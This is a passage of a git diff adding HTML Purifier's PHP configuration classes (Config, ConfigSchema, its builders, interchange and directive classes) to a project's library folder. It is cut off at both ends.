$value = $a; + $key = "$key.$directive"; + $this->triggerError("Using deprecated API: use \$config->set('$key', ...) instead", E_USER_NOTICE); + } else { + list($namespace) = explode('.', $key); + } + if ($this->isFinalized('Cannot set directive after finalization')) return; + if (!isset($this->def->info[$key])) { + $this->triggerError('Cannot set undefined directive ' . htmlspecialchars($key) . ' to value', + E_USER_WARNING); + return; + } + $def = $this->def->info[$key]; + + if (isset($def->isAlias)) { + if ($this->aliasMode) { + $this->triggerError('Double-aliases not allowed, please fix '. + 'ConfigSchema bug with' . $key, E_USER_ERROR); + return; + } + $this->aliasMode = true; + $this->set($def->key, $value); + $this->aliasMode = false; + $this->triggerError("$key is an alias, preferred directive name is {$def->key}", E_USER_NOTICE); + return; + } + + // Raw type might be negative when using the fully optimized form + // of stdclass, which indicates allow_null == true + $rtype = is_int($def) ? $def : $def->type; + if ($rtype < 0) { + $type = -$rtype; + $allow_null = true; + } else { + $type = $rtype; + $allow_null = isset($def->allow_null); + } + + try { + $value = $this->parser->parse($value, $type, $allow_null); + } catch (HTMLPurifier_VarParserException $e) { + $this->triggerError('Value for ' . $key . ' is of invalid type, should be ' . HTMLPurifier_VarParser::getTypeName($type), E_USER_WARNING); + return; + } + if (is_string($value) && is_object($def)) { + // resolve value alias if defined + if (isset($def->aliases[$value])) { + $value = $def->aliases[$value]; + } + // check to see if the value is allowed + if (isset($def->allowed) && !isset($def->allowed[$value])) { + $this->triggerError('Value not supported, valid values are: ' . + $this->_listify($def->allowed), E_USER_WARNING); + return; + } + } + $this->plist->set($key, $value); + + // reset definitions if the directives they depend on changed + // this is a very costly process, so it's discouraged + // with finalization + if ($namespace == 'HTML' || $namespace == 'CSS' || $namespace == 'URI') { + $this->definitions[$namespace] = null; + } + + $this->serials[$namespace] = false; + } + + /** + * Convenience function for error reporting + */ + private function _listify($lookup) { + $list = array(); + foreach ($lookup as $name => $b) $list[] = $name; + return implode(', ', $list); + } + + /** + * Retrieves object reference to the HTML definition. + * @param $raw Return a copy that has not been setup yet. Must be + * called before it's been setup, otherwise won't work. + * @param $optimized If true, this method may return null, to + * indicate that a cached version of the modified + * definition object is available and no further edits + * are necessary. Consider using + * maybeGetRawHTMLDefinition, which is more explicitly + * named, instead. + */ + public function getHTMLDefinition($raw = false, $optimized = false) { + return $this->getDefinition('HTML', $raw, $optimized); + } + + /** + * Retrieves object reference to the CSS definition + * @param $raw Return a copy that has not been setup yet. Must be + * called before it's been setup, otherwise won't work. + * @param $optimized If true, this method may return null, to + * indicate that a cached version of the modified + * definition object is available and no further edits + * are necessary. Consider using + * maybeGetRawCSSDefinition, which is more explicitly + * named, instead. + */ + public function getCSSDefinition($raw = false, $optimized = false) { + return $this->getDefinition('CSS', $raw, $optimized); + } + + /** + * Retrieves object reference to the URI definition + * @param $raw Return a copy that has not been setup yet. Must be + * called before it's been setup, otherwise won't work. + * @param $optimized If true, this method may return null, to + * indicate that a cached version of the modified + * definition object is available and no further edits + * are necessary. Consider using + * maybeGetRawURIDefinition, which is more explicitly + * named, instead. + */ + public function getURIDefinition($raw = false, $optimized = false) { + return $this->getDefinition('URI', $raw, $optimized); + } + + /** + * Retrieves a definition + * @param $type Type of definition: HTML, CSS, etc + * @param $raw Whether or not definition should be returned raw + * @param $optimized Only has an effect when $raw is true. Whether + * or not to return null if the result is already present in + * the cache. This is off by default for backwards + * compatibility reasons, but you need to do things this + * way in order to ensure that caching is done properly. + * Check out enduser-customize.html for more details. + * We probably won't ever change this default, as much as the + * maybe semantics is the "right thing to do." + */ + public function getDefinition($type, $raw = false, $optimized = false) { + if ($optimized && !$raw) { + throw new HTMLPurifier_Exception("Cannot set optimized = true when raw = false"); + } + if (!$this->finalized) $this->autoFinalize(); + // temporarily suspend locks, so we can handle recursive definition calls + $lock = $this->lock; + $this->lock = null; + $factory = HTMLPurifier_DefinitionCacheFactory::instance(); + $cache = $factory->create($type, $this); + $this->lock = $lock; + if (!$raw) { + // full definition + // --------------- + // check if definition is in memory + if (!empty($this->definitions[$type])) { + $def = $this->definitions[$type]; + // check if the definition is setup + if ($def->setup) { + return $def; + } else { + $def->setup($this); + if ($def->optimized) $cache->add($def, $this); + return $def; + } + } + // check if definition is in cache + $def = $cache->get($this); + if ($def) { + // definition in cache, save to memory and return it + $this->definitions[$type] = $def; + return $def; + } + // initialize it + $def = $this->initDefinition($type); + // set it up + $this->lock = $type; + $def->setup($this); + $this->lock = null; + // save in cache + $cache->add($def, $this); + // return it + return $def; + } else { + // raw definition + // -------------- + // check preconditions + $def = null; + if ($optimized) { + if (is_null($this->get($type . '.DefinitionID'))) { + // fatally error out if definition ID not set + throw new HTMLPurifier_Exception("Cannot retrieve raw version without specifying %$type.DefinitionID"); + } + } + if (!empty($this->definitions[$type])) { + $def = $this->definitions[$type]; + if ($def->setup && !$optimized) { + $extra = $this->chatty ? " (try moving this code block earlier in your initialization)" : ""; + throw new HTMLPurifier_Exception("Cannot retrieve raw definition after it has already been setup" . $extra); + } + if ($def->optimized === null) { + $extra = $this->chatty ? " (try flushing your cache)" : ""; + throw new HTMLPurifier_Exception("Optimization status of definition is unknown" . $extra); + } + if ($def->optimized !== $optimized) { + $msg = $optimized ? "optimized" : "unoptimized"; + $extra = $this->chatty ? " (this backtrace is for the first inconsistent call, which was for a $msg raw definition)" : ""; + throw new HTMLPurifier_Exception("Inconsistent use of optimized and unoptimized raw definition retrievals" . $extra); + } + } + // check if definition was in memory + if ($def) { + if ($def->setup) { + // invariant: $optimized === true (checked above) + return null; + } else { + return $def; + } + } + // if optimized, check if definition was in cache + // (because we do the memory check first, this formulation + // is prone to cache slamming, but I think + // guaranteeing that either /all/ of the raw + // setup code or /none/ of it is run is more important.) + if ($optimized) { + // This code path only gets run once; once we put + // something in $definitions (which is guaranteed by the + // trailing code), we always short-circuit above. + $def = $cache->get($this); + if ($def) { + // save the full definition for later, but don't + // return it yet + $this->definitions[$type] = $def; + return null; + } + } + // check invariants for creation + if (!$optimized) { + if (!is_null($this->get($type . '.DefinitionID'))) { + if ($this->chatty) { + $this->triggerError("Due to a documentation error in previous version of HTML Purifier, your definitions are not being cached. If this is OK, you can remove the %$type.DefinitionRev and %$type.DefinitionID declaration. Otherwise, modify your code to use maybeGetRawDefinition, and test if the returned value is null before making any edits (if it is null, that means that a cached version is available, and no raw operations are necessary). See <a href='http://htmlpurifier.org/docs/enduser-customize.html#optimized'>Customize</a> for more details", E_USER_WARNING); + } else { + $this->triggerError("Useless DefinitionID declaration", E_USER_WARNING); + } + } + } + // initialize it + $def = $this->initDefinition($type); + $def->optimized = $optimized; + return $def; + } + throw new HTMLPurifier_Exception("The impossible happened!"); + } + + private function initDefinition($type) { + // quick checks failed, let's create the object + if ($type == 'HTML') { + $def = new HTMLPurifier_HTMLDefinition(); + } elseif ($type == 'CSS') { + $def = new HTMLPurifier_CSSDefinition(); + } elseif ($type == 'URI') { + $def = new HTMLPurifier_URIDefinition(); + } else { + throw new HTMLPurifier_Exception("Definition of $type type not supported"); + } + $this->definitions[$type] = $def; + return $def; + } + + public function maybeGetRawDefinition($name) { + return $this->getDefinition($name, true, true); + } + + public function maybeGetRawHTMLDefinition() { + return $this->getDefinition('HTML', true, true); + } + + public function maybeGetRawCSSDefinition() { + return $this->getDefinition('CSS', true, true); + } + + public function maybeGetRawURIDefinition() { + return $this->getDefinition('URI', true, true); + } + + /** + * Loads configuration values from an array with the following structure: + * Namespace.Directive => Value + * @param $config_array Configuration associative array + */ + public function loadArray($config_array) { + if ($this->isFinalized('Cannot load directives after finalization')) return; + foreach ($config_array as $key => $value) { + $key = str_replace('_', '.', $key); + if (strpos($key, '.') !== false) { + $this->set($key, $value); + } else { + $namespace = $key; + $namespace_values = $value; + foreach ($namespace_values as $directive => $value) { + $this->set($namespace .'.'. $directive, $value); + } + } + } + } + + /** + * Returns a list of array(namespace, directive) for all directives + * that are allowed in a web-form context as per an allowed + * namespaces/directives list. + * @param $allowed List of allowed namespaces/directives + */ + public static function getAllowedDirectivesForForm($allowed, $schema = null) { + if (!$schema) { + $schema = HTMLPurifier_ConfigSchema::instance(); + } + if ($allowed !== true) { + if (is_string($allowed)) $allowed = array($allowed); + $allowed_ns = array(); + $allowed_directives = array(); + $blacklisted_directives = array(); + foreach ($allowed as $ns_or_directive) { + if (strpos($ns_or_directive, '.') !== false) { + // directive + if ($ns_or_directive[0] == '-') { + $blacklisted_directives[substr($ns_or_directive, 1)] = true; + } else { + $allowed_directives[$ns_or_directive] = true; + } + } else { + // namespace + $allowed_ns[$ns_or_directive] = true; + } + } + } + $ret = array(); + foreach ($schema->info as $key => $def) { + list($ns, $directive) = explode('.', $key, 2); + if ($allowed !== true) { + if (isset($blacklisted_directives["$ns.$directive"])) continue; + if (!isset($allowed_directives["$ns.$directive"]) && !isset($allowed_ns[$ns])) continue; + } + if (isset($def->isAlias)) continue; + if ($directive == 'DefinitionID' || $directive == 'DefinitionRev') continue; + $ret[] = array($ns, $directive); + } + return $ret; + } + + /** + * Loads configuration values from $_GET/$_POST that were posted + * via ConfigForm + * @param $array $_GET or $_POST array to import + * @param $index Index/name that the config variables are in + * @param $allowed List of allowed namespaces/directives + * @param $mq_fix Boolean whether or not to enable magic quotes fix + * @param $schema Instance of HTMLPurifier_ConfigSchema to use, if not global copy + */ + public static function loadArrayFromForm($array, $index = false, $allowed = true, $mq_fix = true, $schema = null) { + $ret = HTMLPurifier_Config::prepareArrayFromForm($array, $index, $allowed, $mq_fix, $schema); + $config = HTMLPurifier_Config::create($ret, $schema); + return $config; + } + + /** + * Merges in configuration values from $_GET/$_POST to object. NOT STATIC. + * @note Same parameters as loadArrayFromForm + */ + public function mergeArrayFromForm($array, $index = false, $allowed = true, $mq_fix = true) { + $ret = HTMLPurifier_Config::prepareArrayFromForm($array, $index, $allowed, $mq_fix, $this->def); + $this->loadArray($ret); + } + + /** + * Prepares an array from a form into something usable for the more + * strict parts of HTMLPurifier_Config + */ + public static function prepareArrayFromForm($array, $index = false, $allowed = true, $mq_fix = true, $schema = null) { + if ($index !== false) $array = (isset($array[$index]) && is_array($array[$index])) ? $array[$index] : array(); + $mq = $mq_fix && function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc(); + + $allowed = HTMLPurifier_Config::getAllowedDirectivesForForm($allowed, $schema); + $ret = array(); + foreach ($allowed as $key) { + list($ns, $directive) = $key; + $skey = "$ns.$directive"; + if (!empty($array["Null_$skey"])) { + $ret[$ns][$directive] = null; + continue; + } + if (!isset($array[$skey])) continue; + $value = $mq ? stripslashes($array[$skey]) : $array[$skey]; + $ret[$ns][$directive] = $value; + } + return $ret; + } + + /** + * Loads configuration values from an ini file + * @param $filename Name of ini file + */ + public function loadIni($filename) { + if ($this->isFinalized('Cannot load directives after finalization')) return; + $array = parse_ini_file($filename, true); + $this->loadArray($array); + } + + /** + * Checks whether or not the configuration object is finalized. + * @param $error String error message, or false for no error + */ + public function isFinalized($error = false) { + if ($this->finalized && $error) { + $this->triggerError($error, E_USER_ERROR); + } + return $this->finalized; + } + + /** + * Finalizes configuration only if auto finalize is on and not + * already finalized + */ + public function autoFinalize() { + if ($this->autoFinalize) { + $this->finalize(); + } else { + $this->plist->squash(true); + } + } + + /** + * Finalizes a configuration object, prohibiting further change + */ + public function finalize() { + $this->finalized = true; + $this->parser = null; + } + + /** + * Produces a nicely formatted error message by supplying the + * stack frame information OUTSIDE of HTMLPurifier_Config. + */ + protected function triggerError($msg, $no) { + // determine previous stack frame + $extra = ''; + if ($this->chatty) { + $trace = debug_backtrace(); + // zip(tail(trace), trace) -- but PHP is not Haskell har har + for ($i = 0, $c = count($trace); $i < $c - 1; $i++) { + if ($trace[$i + 1]['class'] === 'HTMLPurifier_Config') { + continue; + } + $frame = $trace[$i]; + $extra = " invoked on line {$frame['line']} in file {$frame['file']}"; + break; + } + } + trigger_error($msg . $extra, $no); + } + + /** + * Returns a serialized form of the configuration object that can + * be reconstituted. + */ + public function serialize() { + $this->getDefinition('HTML'); + $this->getDefinition('CSS'); + $this->getDefinition('URI'); + return serialize($this); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema.php b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema.php new file mode 100644 index 000000000..fadf7a589 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema.php @@ -0,0 +1,164 @@ +<?php + +/** + * Configuration definition, defines directives and their defaults. + */ +class HTMLPurifier_ConfigSchema { + + /** + * Defaults of the directives and namespaces. + * @note This shares the exact same structure as HTMLPurifier_Config::$conf + */ + public $defaults = array(); + + /** + * The default property list. Do not edit this property list. + */ + public $defaultPlist; + + /** + * Definition of the directives. The structure of this is: + * + * array( + * 'Namespace' => array( + * 'Directive' => new stdclass(), + * ) + * ) + * + * The stdclass may have the following properties: + * + * - If isAlias isn't set: + * - type: Integer type of directive, see HTMLPurifier_VarParser for definitions + * - allow_null: If set, this directive allows null values + * - aliases: If set, an associative array of value aliases to real values + * - allowed: If set, a lookup array of allowed (string) values + * - If isAlias is set: + * - namespace: Namespace this directive aliases to + * - name: Directive name this directive aliases to + * + * In certain degenerate cases, stdclass will actually be an integer. In + * that case, the value is equivalent to an stdclass with the type + * property set to the integer. If the integer is negative, type is + * equal to the absolute value of integer, and allow_null is true. + * + * This class is friendly with HTMLPurifier_Config. If you need introspection + * about the schema, you're better of using the ConfigSchema_Interchange, + * which uses more memory but has much richer information. + */ + public $info = array(); + + /** + * Application-wide singleton + */ + static protected $singleton; + + public function __construct() { + $this->defaultPlist = new HTMLPurifier_PropertyList(); + } + + /** + * Unserializes the default ConfigSchema. + */ + public static function makeFromSerial() { + $contents = file_get_contents(HTMLPURIFIER_PREFIX . '/HTMLPurifier/ConfigSchema/schema.ser'); + $r = unserialize($contents); + if (!$r) { + $hash = sha1($contents); + trigger_error("Unserialization of configuration schema failed, sha1 of file was $hash", E_USER_ERROR); + } + return $r; + } + + /** + * Retrieves an instance of the application-wide configuration definition. + */ + public static function instance($prototype = null) { + if ($prototype !== null) { + HTMLPurifier_ConfigSchema::$singleton = $prototype; + } elseif (HTMLPurifier_ConfigSchema::$singleton === null || $prototype === true) { + HTMLPurifier_ConfigSchema::$singleton = HTMLPurifier_ConfigSchema::makeFromSerial(); + } + return HTMLPurifier_ConfigSchema::$singleton; + } + + /** + * Defines a directive for configuration + * @warning Will fail of directive's namespace is defined. + * @warning This method's signature is slightly different from the legacy + * define() static method! Beware! + * @param $namespace Namespace the directive is in + * @param $name Key of directive + * @param $default Default value of directive + * @param $type Allowed type of the directive. See + * HTMLPurifier_DirectiveDef::$type for allowed values + * @param $allow_null Whether or not to allow null values + */ + public function add($key, $default, $type, $allow_null) { + $obj = new stdclass(); + $obj->type = is_int($type) ? $type : HTMLPurifier_VarParser::$types[$type]; + if ($allow_null) $obj->allow_null = true; + $this->info[$key] = $obj; + $this->defaults[$key] = $default; + $this->defaultPlist->set($key, $default); + } + + /** + * Defines a directive value alias. + * + * Directive value aliases are convenient for developers because it lets + * them set a directive to several values and get the same result. + * @param $namespace Directive's namespace + * @param $name Name of Directive + * @param $aliases Hash of aliased values to the real alias + */ + public function addValueAliases($key, $aliases) { + if (!isset($this->info[$key]->aliases)) { + $this->info[$key]->aliases = array(); + } + foreach ($aliases as $alias => $real) { + $this->info[$key]->aliases[$alias] = $real; + } + } + + /** + * Defines a set of allowed values for a directive. + * @warning This is slightly different from the corresponding static + * method definition. + * @param $namespace Namespace of directive + * @param $name Name of directive + * @param $allowed Lookup array of allowed values + */ + public function addAllowedValues($key, $allowed) { + $this->info[$key]->allowed = $allowed; + } + + /** + * Defines a directive alias for backwards compatibility + * @param $namespace + * @param $name Directive that will be aliased + * @param $new_namespace + * @param $new_name Directive that the alias will be to + */ + public function addAlias($key, $new_key) { + $obj = new stdclass; + $obj->key = $new_key; + $obj->isAlias = true; + $this->info[$key] = $obj; + } + + /** + * Replaces any stdclass that only has the type property with type integer. + */ + public function postProcess() { + foreach ($this->info as $key => $v) { + if (count((array) $v) == 1) { + $this->info[$key] = $v->type; + } elseif (count((array) $v) == 2 && isset($v->allow_null)) { + $this->info[$key] = -$v->type; + } + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Builder/ConfigSchema.php b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Builder/ConfigSchema.php new file mode 100644 index 000000000..c05668a70 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Builder/ConfigSchema.php @@ -0,0 +1,44 @@ +<?php + +/** + * Converts HTMLPurifier_ConfigSchema_Interchange to our runtime + * representation used to perform checks on user configuration. + */ +class HTMLPurifier_ConfigSchema_Builder_ConfigSchema +{ + + public function build($interchange) { + $schema = new HTMLPurifier_ConfigSchema(); + foreach ($interchange->directives as $d) { + $schema->add( + $d->id->key, + $d->default, + $d->type, + $d->typeAllowsNull + ); + if ($d->allowed !== null) { + $schema->addAllowedValues( + $d->id->key, + $d->allowed + ); + } + foreach ($d->aliases as $alias) { + $schema->addAlias( + $alias->key, + $d->id->key + ); + } + if ($d->valueAliases !== null) { + $schema->addValueAliases( + $d->id->key, + $d->valueAliases + ); + } + } + $schema->postProcess(); + return $schema; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Builder/Xml.php b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Builder/Xml.php new file mode 100644 index 000000000..244561a37 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Builder/Xml.php @@ -0,0 +1,106 @@ +<?php + +/** + * Converts HTMLPurifier_ConfigSchema_Interchange to an XML format, + * which can be further processed to generate documentation. + */ +class HTMLPurifier_ConfigSchema_Builder_Xml extends XMLWriter +{ + + protected $interchange; + private $namespace; + + protected function writeHTMLDiv($html) { + $this->startElement('div'); + + $purifier = HTMLPurifier::getInstance(); + $html = $purifier->purify($html); + $this->writeAttribute('xmlns', 'http://www.w3.org/1999/xhtml'); + $this->writeRaw($html); + + $this->endElement(); // div + } + + protected function export($var) { + if ($var === array()) return 'array()'; + return var_export($var, true); + } + + public function build($interchange) { + // global access, only use as last resort + $this->interchange = $interchange; + + $this->setIndent(true); + $this->startDocument('1.0', 'UTF-8'); + $this->startElement('configdoc'); + $this->writeElement('title', $interchange->name); + + foreach ($interchange->directives as $directive) { + $this->buildDirective($directive); + } + + if ($this->namespace) $this->endElement(); // namespace + + $this->endElement(); // configdoc + $this->flush(); + } + + public function buildDirective($directive) { + + // Kludge, although I suppose having a notion of a "root namespace" + // certainly makes things look nicer when documentation is built. + // Depends on things being sorted. + if (!$this->namespace || $this->namespace !== $directive->id->getRootNamespace()) { + if ($this->namespace) $this->endElement(); // namespace + $this->namespace = $directive->id->getRootNamespace(); + $this->startElement('namespace'); + $this->writeAttribute('id', $this->namespace); + $this->writeElement('name', $this->namespace); + } + + $this->startElement('directive'); + $this->writeAttribute('id', $directive->id->toString()); + + $this->writeElement('name', $directive->id->getDirective()); + + $this->startElement('aliases'); + foreach ($directive->aliases as $alias) $this->writeElement('alias', $alias->toString()); + $this->endElement(); // aliases + + $this->startElement('constraints'); + if ($directive->version) $this->writeElement('version', $directive->version); + $this->startElement('type'); + if ($directive->typeAllowsNull) $this->writeAttribute('allow-null', 'yes'); + $this->text($directive->type); + $this->endElement(); // type + if ($directive->allowed) { + $this->startElement('allowed'); + foreach ($directive->allowed as $value => $x) $this->writeElement('value', $value); + $this->endElement(); // allowed + } + $this->writeElement('default', $this->export($directive->default)); + $this->writeAttribute('xml:space', 'preserve'); + if ($directive->external) { + $this->startElement('external'); + foreach ($directive->external as $project) $this->writeElement('project', $project); + $this->endElement(); + } + $this->endElement(); // constraints + + if ($directive->deprecatedVersion) { + $this->startElement('deprecated'); + $this->writeElement('version', $directive->deprecatedVersion); + $this->writeElement('use', $directive->deprecatedUse->toString()); + $this->endElement(); // deprecated + } + + $this->startElement('description'); + $this->writeHTMLDiv($directive->description); + $this->endElement(); // description + + $this->endElement(); // directive + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Exception.php b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Exception.php new file mode 100644 index 000000000..2671516c5 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Exception.php @@ -0,0 +1,11 @@ +<?php + +/** + * Exceptions related to configuration schema + */ +class HTMLPurifier_ConfigSchema_Exception extends HTMLPurifier_Exception +{ + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Interchange.php b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Interchange.php new file mode 100644 index 000000000..91a5aa730 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Interchange.php @@ -0,0 +1,42 @@ +<?php + +/** + * Generic schema interchange format that can be converted to a runtime + * representation (HTMLPurifier_ConfigSchema) or HTML documentation. Members + * are completely validated. + */ +class HTMLPurifier_ConfigSchema_Interchange +{ + + /** + * Name of the application this schema is describing. + */ + public $name; + + /** + * Array of Directive ID => array(directive info) + */ + public $directives = array(); + + /** + * Adds a directive array to $directives + */ + public function addDirective($directive) { + if (isset($this->directives[$i = $directive->id->toString()])) { + throw new HTMLPurifier_ConfigSchema_Exception("Cannot redefine directive '$i'"); + } + $this->directives[$i] = $directive; + } + + /** + * Convenience function to perform standard validation. Throws exception + * on failed validation. + */ + public function validate() { + $validator = new HTMLPurifier_ConfigSchema_Validator(); + return $validator->validate($this); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Interchange/Directive.php b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Interchange/Directive.php new file mode 100644 index 000000000..ac8be0d97 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Interchange/Directive.php @@ -0,0 +1,77 @@ +<?php + +/** + * Interchange component class describing configuration directives. + */ +class HTMLPurifier_ConfigSchema_Interchange_Directive +{ + + /** + * ID of directive, instance of HTMLPurifier_ConfigSchema_Interchange_Id. + */ + public $id; + + /** + * String type, e.g. 'integer' or 'istring'. + */ + public $type; + + /** + * Default value, e.g. 3 or 'DefaultVal'. + */ + public $default; + + /** + * HTML description. + */ + public $description; + + /** + * Boolean whether or not null is allowed as a value. + */ + public $typeAllowsNull = false; + + /** + * Lookup table of allowed scalar values, e.g. array('allowed' => true). + * Null if all values are allowed. + */ + public $allowed; + + /** + * List of aliases for the directive, + * e.g. array(new HTMLPurifier_ConfigSchema_Interchange_Id('Ns', 'Dir'))). + */ + public $aliases = array(); + + /** + * Hash of value aliases, e.g. array('alt' => 'real'). Null if value + * aliasing is disabled (necessary for non-scalar types). + */ + public $valueAliases; + + /** + * Version of HTML Purifier the directive was introduced, e.g. '1.3.1'. + * Null if the directive has always existed. + */ + public $version; + + /** + * ID of directive that supercedes this old directive, is an instance + * of HTMLPurifier_ConfigSchema_Interchange_Id. Null if not deprecated. + */ + public $deprecatedUse; + + /** + * Version of HTML Purifier this directive was deprecated. Null if not + * deprecated. + */ + public $deprecatedVersion; + + /** + * List of external projects this directive depends on, e.g. array('CSSTidy'). + */ + public $external = array(); + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Interchange/Id.php b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Interchange/Id.php new file mode 100644 index 000000000..b9b3c6f5c --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Interchange/Id.php @@ -0,0 +1,37 @@ +<?php + +/** + * Represents a directive ID in the interchange format. + */ +class HTMLPurifier_ConfigSchema_Interchange_Id +{ + + public $key; + + public function __construct($key) { + $this->key = $key; + } + + /** + * @warning This is NOT magic, to ensure that people don't abuse SPL and + * cause problems for PHP 5.0 support. + */ + public function toString() { + return $this->key; + } + + public function getRootNamespace() { + return substr($this->key, 0, strpos($this->key, ".")); + } + + public function getDirective() { + return substr($this->key, strpos($this->key, ".") + 1); + } + + public static function make($id) { + return new HTMLPurifier_ConfigSchema_Interchange_Id($id); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php new file mode 100644 index 000000000..785b72ce8 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php @@ -0,0 +1,180 @@ +<?php + +class HTMLPurifier_ConfigSchema_InterchangeBuilder +{ + + /** + * Used for processing DEFAULT, nothing else. + */ + protected $varParser; + + public function __construct($varParser = null) { + $this->varParser = $varParser ? $varParser : new HTMLPurifier_VarParser_Native(); + } + + public static function buildFromDirectory($dir = null) { + $builder = new HTMLPurifier_ConfigSchema_InterchangeBuilder(); + $interchange = new HTMLPurifier_ConfigSchema_Interchange(); + return $builder->buildDir($interchange, $dir); + } + + public function buildDir($interchange, $dir = null) { + if (!$dir) $dir = HTMLPURIFIER_PREFIX . '/HTMLPurifier/ConfigSchema/schema'; + if (file_exists($dir . '/info.ini')) { + $info = parse_ini_file($dir . '/info.ini'); + $interchange->name = $info['name']; + } + + $files = array(); + $dh = opendir($dir); + while (false !== ($file = readdir($dh))) { + if (!$file || $file[0] == '.' || strrchr($file, '.') !== '.txt') { + continue; + } + $files[] = $file; + } + closedir($dh); + + sort($files); + foreach ($files as $file) { + $this->buildFile($interchange, $dir . '/' . $file); + } + + return $interchange; + } + + public function buildFile($interchange, $file) { + $parser = new HTMLPurifier_StringHashParser(); + $this->build( + $interchange, + new HTMLPurifier_StringHash( $parser->parseFile($file) ) + ); + } + + /** + * Builds an interchange object based on a hash. + * @param $interchange HTMLPurifier_ConfigSchema_Interchange object to build + * @param $hash HTMLPurifier_ConfigSchema_StringHash source data + */ + public function build($interchange, $hash) { + if (!$hash instanceof HTMLPurifier_StringHash) { + $hash = new HTMLPurifier_StringHash($hash); + } + if (!isset($hash['ID'])) { + throw new HTMLPurifier_ConfigSchema_Exception('Hash does not have any ID'); + } + if (strpos($hash['ID'], '.') === false) { + if (count($hash) == 2 && isset($hash['DESCRIPTION'])) { + $hash->offsetGet('DESCRIPTION'); // prevent complaining + } else { + throw new HTMLPurifier_ConfigSchema_Exception('All directives must have a namespace'); + } + } else { + $this->buildDirective($interchange, $hash); + } + $this->_findUnused($hash); + } + + public function buildDirective($interchange, $hash) { + $directive = new HTMLPurifier_ConfigSchema_Interchange_Directive(); + + // These are required elements: + $directive->id = $this->id($hash->offsetGet('ID')); + $id = $directive->id->toString(); // convenience + + if (isset($hash['TYPE'])) { + $type = explode('/', $hash->offsetGet('TYPE')); + if (isset($type[1])) $directive->typeAllowsNull = true; + $directive->type = $type[0]; + } else { + throw new HTMLPurifier_ConfigSchema_Exception("TYPE in directive hash '$id' not defined"); + } + + if (isset($hash['DEFAULT'])) { + try { + $directive->default = $this->varParser->parse($hash->offsetGet('DEFAULT'), $directive->type, $directive->typeAllowsNull); + } catch (HTMLPurifier_VarParserException $e) { + throw new HTMLPurifier_ConfigSchema_Exception($e->getMessage() . " in DEFAULT in directive hash '$id'"); + } + } + + if (isset($hash['DESCRIPTION'])) { + $directive->description = $hash->offsetGet('DESCRIPTION'); + } + + if (isset($hash['ALLOWED'])) { + $directive->allowed = $this->lookup($this->evalArray($hash->offsetGet('ALLOWED'))); + } + + if (isset($hash['VALUE-ALIASES'])) { + $directive->valueAliases = $this->evalArray($hash->offsetGet('VALUE-ALIASES')); + } + + if (isset($hash['ALIASES'])) { + $raw_aliases = trim($hash->offsetGet('ALIASES')); + $aliases = preg_split('/\s*,\s*/', $raw_aliases); + foreach ($aliases as $alias) { + $directive->aliases[] = $this->id($alias); + } + } + + if (isset($hash['VERSION'])) { + $directive->version = $hash->offsetGet('VERSION'); + } + + if (isset($hash['DEPRECATED-USE'])) { + $directive->deprecatedUse = $this->id($hash->offsetGet('DEPRECATED-USE')); + } + + if (isset($hash['DEPRECATED-VERSION'])) { + $directive->deprecatedVersion = $hash->offsetGet('DEPRECATED-VERSION'); + } + + if (isset($hash['EXTERNAL'])) { + $directive->external = preg_split('/\s*,\s*/', trim($hash->offsetGet('EXTERNAL'))); + } + + $interchange->addDirective($directive); + } + + /** + * Evaluates an array PHP code string without array() wrapper + */ + protected function evalArray($contents) { + return eval('return array('. $contents .');'); + } + + /** + * Converts an array list into a lookup array. + */ + protected function lookup($array) { + $ret = array(); + foreach ($array as $val) $ret[$val] = true; + return $ret; + } + + /** + * Convenience function that creates an HTMLPurifier_ConfigSchema_Interchange_Id + * object based on a string Id. + */ + protected function id($id) { + return HTMLPurifier_ConfigSchema_Interchange_Id::make($id); + } + + /** + * Triggers errors for any unused keys passed in the hash; such keys + * may indicate typos, missing values, etc. + * @param $hash Instance of ConfigSchema_StringHash to check. + */ + protected function _findUnused($hash) { + $accessed = $hash->getAccessed(); + foreach ($hash as $k => $v) { + if (!isset($accessed[$k])) { + trigger_error("String hash key '$k' not used by builder", E_USER_NOTICE); + } + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Validator.php b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Validator.php new file mode 100644 index 000000000..f374f6a02 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/Validator.php @@ -0,0 +1,206 @@ +<?php + +/** + * Performs validations on HTMLPurifier_ConfigSchema_Interchange + * + * @note If you see '// handled by 